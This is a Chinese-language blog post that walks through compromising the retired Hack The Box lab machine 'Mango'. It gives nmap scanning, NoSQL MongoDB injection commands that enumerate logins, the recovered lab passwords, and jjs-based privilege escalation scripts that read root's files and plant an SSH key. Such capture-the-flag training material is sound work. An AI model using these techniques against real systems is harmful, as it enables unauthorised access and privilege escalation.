freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

HTB: Mango渗透测试
HBXQ 2021-03-06 17:29:03 124445

基础信息

简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透
链接:https://www.hackthebox.eu/home/machines/profile/214
描述:
图片.png注:因为是已经退役的靶机所以现在的ip地址与信息卡中的并不一致。

前言

本次演练使用kali系统按照渗透测试的过程进行操作,通过前期的信息收集与普通注入不能获取到有用的信息,通过谷歌诸侯知道,可以利用 Nosql-MongoDB-injection爬取账号与密码,使用ssh远程连接获取user.txt最终通过提权获取root.txt。

一、信息收集

1、靶机ip

ip地址为:10.129.1.219
图片.png

2、靶机端口与服务

nmap -sV -A -O 10.129.1.219

图片.png获取到开放端口与版本信息并且获得了正在使用的域名信息

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))

3、网站信息收集

查看80与443端口
图片.png发现443端口是一个类似于谷歌的搜索界面通过证书获得一些信息
图片.png

二、漏洞探测与利用

Nosql-MongoDB-injection

将重点放在80端口,这个端口是一个登录界面,经过尝试通过普通的sql注入无法爬取到有用的信息
通过谷歌发现存在Nosql-MongoDB-injection可以利用脚本进行注入尝试获取账号与密码
链接:https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username -op login:login,submit:submit
python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep password -op login:login,submit:submit

图片.png图片.png用户:admin 密码:t9KcS3>!0B#2
用户:mango 密码:h3mXK8RhU~f{]f5H

使用获得的账号密码进行登录
无论使用哪一个都会跳转到这个界面
图片.png通过ssh进行远程连接 并跳转到admin用户,否则无法查看到admin文件夹下的user.txt
图片.png图片.png

三、提权

获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

使用LinEnum.sh查看是否存在可利用信息
最终根据提示找到了jjs可以利用jjs进行提权
图片.png使用GTFOBins 查看可利用脚本
链接:https://gtfobins.github.io/
图片.png(1) 通过运行文件读取命令直接获得root.txt

var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }

图片.png

(2) 通过jjs上传我们自己生成的ssh公钥然后使用我们自己的私钥进行连接获取root权限

ssh-keygen

图片.png完善脚本信息
图片.png图片.png

echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("./file_to_write");
fw.write("DATA");
fw.close();' | jjs

在获取的shell中执行脚本最后在kali中进行登录获取root权限
图片.png图片.png

# 渗透测试 # web安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 HBXQ 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
靶场系列
HBXQ LV.5
搬砖小牛马
  • 43 文章数
  • 48 关注者
安卓基础:安卓安装包APK的组成以及生成步骤
2021-10-18
HTB:Dropzone渗透测试
2021-08-26
HTB:Active渗透测试
2021-08-24
文章目录